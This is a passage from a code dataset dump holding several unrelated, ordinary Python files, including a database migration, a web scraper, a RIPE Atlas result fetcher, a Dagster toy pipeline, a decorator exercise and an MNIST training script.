"line_number": 46, "usage_type": "call"}, {"api_name": "widgets.utils", "line_number": 46, "usage_type": "name"}]}
+{"seq_id": "356879402", "text": "\"\"\"empty message\n\nRevision ID: b461795a6389\nRevises: \nCreate Date: 2021-09-07 17:18:57.405513\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'b461795a6389'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('channels',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('channelName', sa.String(), nullable=True),\n sa.Column('createdTime', sa.DateTime(), nullable=True),\n sa.Column('updatedTime', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('channelName')\n )\n op.create_index(op.f('ix_channels_id'), 'channels', ['id'], unique=False)\n op.create_table('mobiles',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('number', sa.String(), nullable=True),\n sa.Column('createdTime', sa.DateTime(), nullable=True),\n sa.Column('updatedTime', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('number')\n )\n op.create_index(op.f('ix_mobiles_id'), 'mobiles', ['id'], unique=False)\n op.create_table('users',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(), nullable=True),\n sa.Column('last_name', sa.String(), nullable=True),\n sa.Column('age', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_users_id'), 'users', ['id'], unique=False)\n op.create_table('groups',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('mobile_id', sa.Integer(), nullable=True),\n sa.Column('Channel_id', sa.Integer(), nullable=True),\n sa.Column('createdTime', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['Channel_id'], ['channels.id'], ),\n sa.ForeignKeyConstraint(['mobile_id'], ['mobiles.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('messages',\n sa.Column('messageID', postgresql.UUID(as_uuid=True), nullable=False),\n sa.Column('message', sa.String(), nullable=True),\n sa.Column('createdTime', sa.DateTime(), nullable=True),\n sa.Column('updatedTime', sa.DateTime(), nullable=True),\n sa.Column('channel_id', sa.Integer(), nullable=True),\n sa.Column('mobile_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['channel_id'], ['channels.id'], ),\n sa.ForeignKeyConstraint(['mobile_id'], ['mobiles.id'], ),\n sa.PrimaryKeyConstraint('messageID')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('messages')\n op.drop_table('groups')\n op.drop_index(op.f('ix_users_id'), table_name='users')\n op.drop_table('users')\n op.drop_index(op.f('ix_mobiles_id'), table_name='mobiles')\n op.drop_table('mobiles')\n op.drop_index(op.f('ix_channels_id'), table_name='channels')\n op.drop_table('channels')\n # ### end Alembic commands ###\n", "sub_path": "alembic/versions/b461795a6389_.py", "file_name": "b461795a6389_.py", "file_ext": "py", "file_size_in_byte": 3058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "alembic.op.create_table", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.UniqueConstraint", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op.create_index", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}, {"api_name": "alembic.op.f", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 30, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.UniqueConstraint", "line_number": 36, "usage_type": "call"}, {"api_name": "alembic.op.create_index", "line_number": 38, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 38, "usage_type": "name"}, {"api_name": "alembic.op.f", "line_number": 38, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 39, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 39, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 40, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 40, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 41, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 41, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 42, "usage_type": "call"}, {"api_name": 
"sqlalchemy.Column", "line_number": 43, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 43, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 44, "usage_type": "call"}, {"api_name": "alembic.op.create_index", "line_number": 46, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 46, "usage_type": "name"}, {"api_name": "alembic.op.f", "line_number": 46, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 47, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 47, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 48, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 49, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 49, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 50, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 50, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 51, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 51, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 52, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 53, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 54, "usage_type": "call"}, {"api_name": "alembic.op.create_table", "line_number": 56, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 56, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 57, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql.UUID", "line_number": 57, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql", "line_number": 57, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 58, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 59, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 59, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 60, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 60, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 62, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 62, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 63, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 64, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 65, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 72, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 72, "usage_type": "name"}, {"api_name": "alembic.op.drop_table", "line_number": 73, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 73, "usage_type": "name"}, {"api_name": "alembic.op.drop_index", "line_number": 74, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 74, "usage_type": "name"}, {"api_name": "alembic.op.f", "line_number": 74, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 75, "usage_type": "call"}, {"api_name": 
"alembic.op", "line_number": 75, "usage_type": "name"}, {"api_name": "alembic.op.drop_index", "line_number": 76, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 76, "usage_type": "name"}, {"api_name": "alembic.op.f", "line_number": 76, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 77, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 77, "usage_type": "name"}, {"api_name": "alembic.op.drop_index", "line_number": 78, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 78, "usage_type": "name"}, {"api_name": "alembic.op.f", "line_number": 78, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 79, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 79, "usage_type": "name"}]}
+{"seq_id": "55686070", "text": "# coding: utf-8\nimport argparse\nfrom pyquery import PyQuery as pq\n\ndef getElementBySelector(URL, selector):\n pqobj = pq(URL)\n parseUrl = pqobj(selector);\n \n # if default selector then return page content\n if selector == \"html\": \n result = parseUrl.outerHtml()\n #else return list of found elements\n else : \n result = [i.text() for i in parseUrl.items()]\n return result\n\ndef isVowel(letter):\n vowels = (\"a\", \"e\", \"i\", \"o\", \"u\", \"y\", #english alphabet\n \"а\", \"е\", \"ё\", \"и\", \"о\", \"у\", \"ы\", \"э\", \"ю\", \"я\") #russian alphabet\n return letter.lower() in vowels;\n\ndef isLetter(letter):\n letter_code = ord(letter.lower())\n \n #97-122 : english alphabet letters\n english_letter = 97 <= letter_code <= 122\n \n #1072-1103 и 1105 : russian alphabet letters\n russian_letter = 1072 <= letter_code <= 1105 or letter_code == 1105\n \n if english_letter or russian_letter:\n return True\n else:\n return False\n\ndef mySortFunction(data):\n if type(data) != str:\n vowels = []\n consonant = []\n other = []\n \n #divide by letters\n for i in data:\n if isVowel(i[0]):\n vowels.append(i)\n elif isLetter(i[0]):\n consonant.append(i)\n else:\n other.append(i)\n \n vowels.sort(key=lambda inputString: inputString[0])\n consonant.sort(key=lambda inputString: inputString[0])\n other.sort(key=lambda inputString: inputString[0])\n\n result = [i for i in vowels]\n for i in consonant:\n result.append(i)\n for i in other:\n result.append(i)\n \n return result\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Parser for any url using css-selector.\")\n parser.add_argument(\"URL\", type=str, help=\"url to parse\")\n \n parser.add_argument(\"-c\", \"--css-selector\", type=str, default=\"html\", \n help=\"selector to get elements. By default selector = 'html'\")\n \n parser.add_argument(\"-s\", \"--sorting\", action=\"store_true\", \n help=\"include the option to sord output data. By default=False\")\n args = parser.parse_args()\n\n result = getElementBySelector(args.URL, args.css_selector)\n \n if args.sorting:\n result = mySortFunction(result)\n\n # танцы с бубном над codepage\n # http://trust-host.ru/support-host/site/175-kodirovka-cp1251-na-sajte.html\n #result = result.encode('iso-8859-1').decode(\"cp1251\").encode(\"utf-8\").decode(\"utf-8\")\n\n for i in result:\n print(i)\n", "sub_path": "parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 2687, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pyquery.PyQuery", "line_number": 6, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 64, "usage_type": "call"}]}
+{"seq_id": "271657201", "text": "#!/usr/bin/python\n\nimport urllib2\nimport json\nimport sys\nimport os\nimport argparse\nfrom collections import defaultdict\n\n\ndef read_auth(filename):\n with open(filename, 'rb') as auth_file:\n key = auth_file.readline()[:-1]\n\n return key\n\n\nparser = argparse.ArgumentParser(\"Retrieves traceroute results\")\nparser.add_argument('--datadir', required=True, help=\"directory to save output\")\nparser.add_argument('--msm', required=False, type=int, help=\"Fetch specific measurement id\")\nargs = parser.parse_args()\n\nif not os.path.exists(args.datadir):\n print(\"Data directory %s must exists!\" % args.datadir)\n sys.exit(1)\n\natlas_read_api_key = 'read-key.txt'\nauthkey = read_auth(atlas_read_api_key)\nif authkey is None:\n print(\"Auth file %s not found, aborting\" % atlas_read_api_key)\n sys.exit(1)\n\nif not args.msm:\n with open(os.path.join(args.datadir, 'measurements.json')) as msm_file:\n msm_data = json.load(msm_file)\nelse:\n msm_data = {'cc': [args.msm]}\n\nresult_list = defaultdict(list)\nfor cc, msm_list in msm_data.iteritems():\n for msm in msm_list:\n print(\"Fetching results for measurement %s\" % msm)\n api_url = \"https://atlas.ripe.net/api/v1/measurement/{}/result/?key={}\".format(msm, authkey)\n request = urllib2.Request(api_url)\n request.add_header(\"Accept\", \"application/json\")\n try:\n conn = urllib2.urlopen(request)\n msm_data = json.load(conn)\n for result in msm_data:\n result_list[cc].append(result)\n conn.close()\n except urllib2.HTTPError as e:\n print >> sys.stderr, (\"Fatal error: %s\" % e.read())\n raise\n\nwith open(os.path.join(args.datadir, 'results.json'), 'wb') as res_file:\n json.dump(result_list, res_file)\n", "sub_path": "fetch-results.py", "file_name": "fetch-results.py", "file_ext": "py", "file_size_in_byte": 1776, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 25, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 35, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 39, "usage_type": "call"}, {"api_name": "urllib2.Request", "line_number": 44, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 47, "usage_type": "call"}, {"api_name": "json.load", "line_number": 48, "usage_type": "call"}, {"api_name": "urllib2.HTTPError", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 57, "usage_type": "call"}]}
+{"seq_id": "214589076", "text": "import urllib\nimport http.cookiejar\nimport re\nimport bz2\n\ncookiejar = http.cookiejar.CookieJar() #声明一个CookieJar对象实例来保存cookie\nhandler = urllib.request.HTTPCookieProcessor(cookiejar) #利用HTTPCookieProcessor对象来创建cookie处理器\nopener = urllib.request.build_opener(handler,urllib.request.HTTPHandler) #通过handler来构建opener\nurllib.request.install_opener(opener) #安装opener作为urlopen()使用的全局URL opener,即以后调用urlopen()时都会使用安装的opener对象。\n\nnum = '12345'\nurl_prefix = 'http://www.pythonchallenge.com/pc/def/linkedlist.php?busynothing='\ninfojar = []\nwhile True:\n file = urllib.request.urlopen(url_prefix+num)\n data = file.read().decode('UTF-8')\n print(data)\n infojar.append(list(cookiejar)[0].value)\n file.close()\n if re.findall('([0-9]+)',data):\n num = re.findall('([0-9]+)',data)[-1]\n else:\n break\n\nunquote_info = urllib.parse.unquote_to_bytes(''.join(infojar).replace('+', '%20'))\nprint(bz2.decompress(unquote_info).decode('utf-8'))\n \n", "sub_path": "level17/cookies.py", "file_name": "cookies.py", "file_ext": "py", "file_size_in_byte": 1053, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "http.cookiejar.cookiejar.CookieJar", "line_number": 6, "usage_type": "call"}, {"api_name": "http.cookiejar.cookiejar", "line_number": 6, "usage_type": "attribute"}, {"api_name": "http.cookiejar", "line_number": 6, "usage_type": "name"}, {"api_name": "urllib.request.HTTPCookieProcessor", "line_number": 7, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 7, "usage_type": "attribute"}, {"api_name": "urllib.request.build_opener", "line_number": 8, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 8, "usage_type": "attribute"}, {"api_name": "urllib.request.install_opener", "line_number": 9, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 9, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 15, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 15, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 20, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 21, "usage_type": "call"}, {"api_name": "urllib.parse.unquote_to_bytes", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 25, "usage_type": "attribute"}, {"api_name": "bz2.decompress", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "255050003", "text": "# coding=utf8\nfrom setuptools import setup\n__author__ = 'hellflame'\n\n\nsetup(\n name='paramSeeker',\n version=\"0.3.2\",\n keywords=('param', 'parameter', 'terminal handler'),\n description=\"Terminal parameter retrive then 执行以及参数转发,开发实体内容\",\n license='Apache License',\n author='hellflame',\n author_email='hellflamedly@gmail.com',\n url=\"https://github.com/hellflame/paramSeeker\",\n packages=[\n 'paramSeeker'\n ],\n platforms=\"any\",\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.4',\n \"Operating System :: OS Independent\"\n ],\n entry_points={\n 'console_scripts': [\n 'seeker=paramSeeker.example:test_env'\n ]\n }\n)\n\n\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1104, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "setuptools.setup", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "188664912", "text": "import random\nimport time\n\nfrom dagster import (\n Field,\n InputDefinition,\n ModeDefinition,\n Output,\n OutputDefinition,\n pipeline,\n solid,\n)\nfrom dagster.core.definitions.executor import default_executors\n\n\ndef get_executor_defs():\n try:\n from dagster_dask import dask_executor\n\n return default_executors + [dask_executor]\n except ImportError:\n return default_executors\n\n\n@solid(\n input_defs=[InputDefinition('chase_duration', int)],\n output_defs=[OutputDefinition(int, 'total')],\n config_schema={\n 'chase_size': Field(\n int,\n default_value=100000,\n is_required=False,\n description='How big should the pointer chase array be?',\n )\n },\n)\ndef hammer(context, chase_duration):\n '''what better way to do a lot of gnarly work than to pointer chase?'''\n ptr_length = context.solid_config['chase_size']\n\n data = list(range(0, ptr_length))\n random.shuffle(data)\n\n curr = random.randint(0, ptr_length)\n # and away we go\n start_time = time.time()\n while (time.time() - start_time) < chase_duration:\n curr = data[curr]\n\n context.log.info('Hammered - start %d end %d' % (start_time, time.time()))\n return chase_duration\n\n\n@solid(\n config_schema=Field(int, is_required=False, default_value=1),\n output_defs=[\n OutputDefinition(int, 'out_1'),\n OutputDefinition(int, 'out_2'),\n OutputDefinition(int, 'out_3'),\n OutputDefinition(int, 'out_4'),\n ],\n)\ndef chase_giver(context):\n chase_duration = context.solid_config\n\n yield Output(chase_duration, 'out_1')\n yield Output(chase_duration, 'out_2')\n yield Output(chase_duration, 'out_3')\n yield Output(chase_duration, 'out_4')\n\n\n@solid(\n input_defs=[\n InputDefinition('in_1', int),\n InputDefinition('in_2', int),\n InputDefinition('in_3', int),\n InputDefinition('in_4', int),\n ],\n output_defs=[OutputDefinition(int)],\n)\ndef reducer(_, in_1, in_2, in_3, in_4):\n return in_1 + in_2 + in_3 + in_4\n\n\n@pipeline(\n # Needed for Dask tests which use this pipeline\n mode_defs=[ModeDefinition(executor_defs=get_executor_defs())]\n)\ndef hammer_pipeline():\n\n out_1, out_2, out_3, out_4 = chase_giver()\n return reducer(\n in_1=hammer(chase_duration=out_1),\n in_2=hammer(chase_duration=out_2),\n in_3=hammer(chase_duration=out_3),\n in_4=hammer(chase_duration=out_4),\n )\n", "sub_path": "python_modules/dagster-test/dagster_test/toys/hammer.py", "file_name": "hammer.py", "file_ext": "py", "file_size_in_byte": 2471, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "dagster.core.definitions.executor.default_executors", "line_number": 20, "usage_type": "name"}, {"api_name": "dagster_dask.dask_executor", "line_number": 20, "usage_type": "name"}, {"api_name": "dagster.core.definitions.executor.default_executors", "line_number": 22, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 42, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "time.time", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 50, "usage_type": "call"}, {"api_name": "dagster.solid", "line_number": 25, "usage_type": "call"}, {"api_name": "dagster.InputDefinition", "line_number": 26, "usage_type": "call"}, {"api_name": "dagster.OutputDefinition", "line_number": 27, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 29, "usage_type": "call"}, {"api_name": 
"dagster.Output", "line_number": 66, "usage_type": "call"}, {"api_name": "dagster.Output", "line_number": 67, "usage_type": "call"}, {"api_name": "dagster.Output", "line_number": 68, "usage_type": "call"}, {"api_name": "dagster.Output", "line_number": 69, "usage_type": "call"}, {"api_name": "dagster.solid", "line_number": 54, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 55, "usage_type": "call"}, {"api_name": "dagster.OutputDefinition", "line_number": 57, "usage_type": "call"}, {"api_name": "dagster.OutputDefinition", "line_number": 58, "usage_type": "call"}, {"api_name": "dagster.OutputDefinition", "line_number": 59, "usage_type": "call"}, {"api_name": "dagster.OutputDefinition", "line_number": 60, "usage_type": "call"}, {"api_name": "dagster.solid", "line_number": 72, "usage_type": "call"}, {"api_name": "dagster.InputDefinition", "line_number": 74, "usage_type": "call"}, {"api_name": "dagster.InputDefinition", "line_number": 75, "usage_type": "call"}, {"api_name": "dagster.InputDefinition", "line_number": 76, "usage_type": "call"}, {"api_name": "dagster.InputDefinition", "line_number": 77, "usage_type": "call"}, {"api_name": "dagster.OutputDefinition", "line_number": 79, "usage_type": "call"}, {"api_name": "dagster.pipeline", "line_number": 85, "usage_type": "call"}, {"api_name": "dagster.ModeDefinition", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "428250383", "text": "\"\"\"\nConcepts: you can decorate methods. And classes!\n\nSame thing but for classes. This introduces a new wrinkle when decorating methods.\n\nThe problem is that our decorator is invoked as each method is defined - we get\nthe function that results from the definition.\n\nBut to store that function function we're going to need to have access to the\ncontaining class to get to the `ENDPOINTS` class variable... and the class\nhasn't been defined when our decorator runs!\n\nWe need to defer actually collecting the methods until after the class has been\ndefined - when it can be done by a class decorator!\n\nUpdate the `endpoint` decorator to mark decorated methods and then update the\n`collect` decorator to loop through the attributes of the class finding the\nmethods we marked and storing them in the `RemoteAPI.ENDPOINTS` dict.\n\nHint: help(vars). Also - functions are objects like anything else, open by\ndefault so its totally fine to say `function._my_mark = 1`.\n\n\"\"\"\nimport argparse\n\n\ndef endpoint(f):\n return f\n\n\ndef collect(klass):\n return klass\n\n\n@collect\nclass RemoteAPI:\n ENDPOINTS = {}\n\n def __init__(self, secrets=None):\n # Presumably load some secrets from a file so we can authenticate our client\n pass\n\n @endpoint\n def sessions(self, event_id=None):\n \"\"\"Returns the session ids for the event.\"\"\"\n return [1, 2, 3]\n\n @endpoint\n def events(self):\n \"\"\"Returns the events to which you have access\"\"\"\n return [2717]\n\n\nif __name__ == \"__main__\":\n # Setup CLI options\n parser = argparse.ArgumentParser()\n # Add a subcommand for every endpoint we've implemented\n subparsers = parser.add_subparsers(\n title=\"Endpoints\",\n help=\"The following endpoints are supported:\",\n dest=\"subcommand\",\n )\n client = RemoteAPI()\n # Using inspect to add flags for endpoint arguments ommitted for brevity\n for (name, func) in client.ENDPOINTS.items():\n sub = subparsers.add_parser(name, help=func.__doc__)\n\n # Pick a subcommand to run\n args = parser.parse_args()\n if not args.subcommand:\n parser.exit(\"Please specify a subcommand\")\n function = client.ENDPOINTS[args.subcommand]\n\n print(function(client)) # Passing instance of RemoteAPI to self. Do you know why?\n", "sub_path": "c_methods.py", "file_name": "c_methods.py", "file_ext": "py", "file_size_in_byte": 2282, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 56, "usage_type": "call"}]}
+{"seq_id": "552178008", "text": "'''\nCreated on May 31, 2016\n\n@author: Peter Hillyard\n'''\n\n# This script is used to plot a link using all channels\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nfname = 'data/rss_data/pizza_house/rss_2016_05_18_epatch_peter_walk_all.txt'\nN = 20\nC = 4\nL = N*(N-1)*C\nlink_database = np.zeros((L,4))\nlink_idx = 0\n\nfor ch in range(C):\n for tx in range(N):\n for rx in range(N):\n if tx == rx:\n continue\n link_database[link_idx,0] = link_idx\n link_database[link_idx,1] = tx\n link_database[link_idx,2] = rx\n link_database[link_idx,3] = ch\n link_idx += 1\n\nplot_link=None\nplot_pair = [1,2]\n\nif plot_link is not None:\n link_to_plot = int(plot_link)\nelif plot_pair is not None:\n tmp = (link_database[:,1] == plot_pair[0]-1) & (link_database[:,2] == plot_pair[1]-1)\n link_to_plot = link_database[tmp,0].astype('int')\n\ntimestamp_vec = []\nrss_vec = []\n\nwith open(fname,'r') as f:\n for line in f:\n split_line = line.split(' ')\n \n timestamp_vec.append(float(split_line.pop()))\n rss = np.array([float(ii) for ii in split_line])\n \n rss_vec.append(rss[link_to_plot].tolist())\n \nrss_vec = np.array(rss_vec)\nrss_vec[rss_vec == 127] = np.nan\ntimestamp_vec = np.array(timestamp_vec)-timestamp_vec[0]\n\nplt.plot(timestamp_vec,rss_vec)\nplt.show()\n ", "sub_path": "plot_link.py", "file_name": "plot_link.py", "file_ext": "py", "file_size_in_byte": 1386, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}]}
+{"seq_id": "455305569", "text": "import argparse\nimport json\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\n\n# Read parameters from Valohai\n# This enables Valohai to version your parameters,\n# run quick iterations and do hyperparameter optimization\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--epochs', type=int, default=5)\nparser.add_argument('--learning_rate', type=float, default=0.001)\nargs = parser.parse_args()\n\n\n# Read input files from Valohai inputs directory\n# This enables Valohai to version your training data\n# and cache the data for quick experimentation\n\ninput_path = os.getenv('VH_INPUTS_DIR', './inputs')\nf = os.path.join(input_path, 'preprocessed_mnist/preprocessed_mnist.npz')\n\nwith np.load(f, allow_pickle=True) as f:\n x_train, y_train = f['x_train'], f['y_train']\n x_test, y_test = f['x_test'], f['y_test']\n\nmodel = tf.keras.models.Sequential([\n tf.keras.layers.Flatten(input_shape=(28, 28)),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Dense(10, activation='softmax')\n])\n\nmodel.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=args.learning_rate),\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\n\n# Print metrics out as JSON\n# This enables Valohai to version your metadata\n# and for you to use it to compare experiments\n\ndef log(epoch, logs):\n print()\n print(json.dumps({\n 'epoch': epoch,\n 'loss': str(logs['loss']),\n 'acc': str(logs['acc']),\n }))\n\ncb = tf.keras.callbacks.LambdaCallback(on_epoch_end=log)\n\nmodel.fit(x_train, y_train, epochs=args.epochs, callbacks=[cb])\n\n\n# Evaluate the model and print out the test metrics as 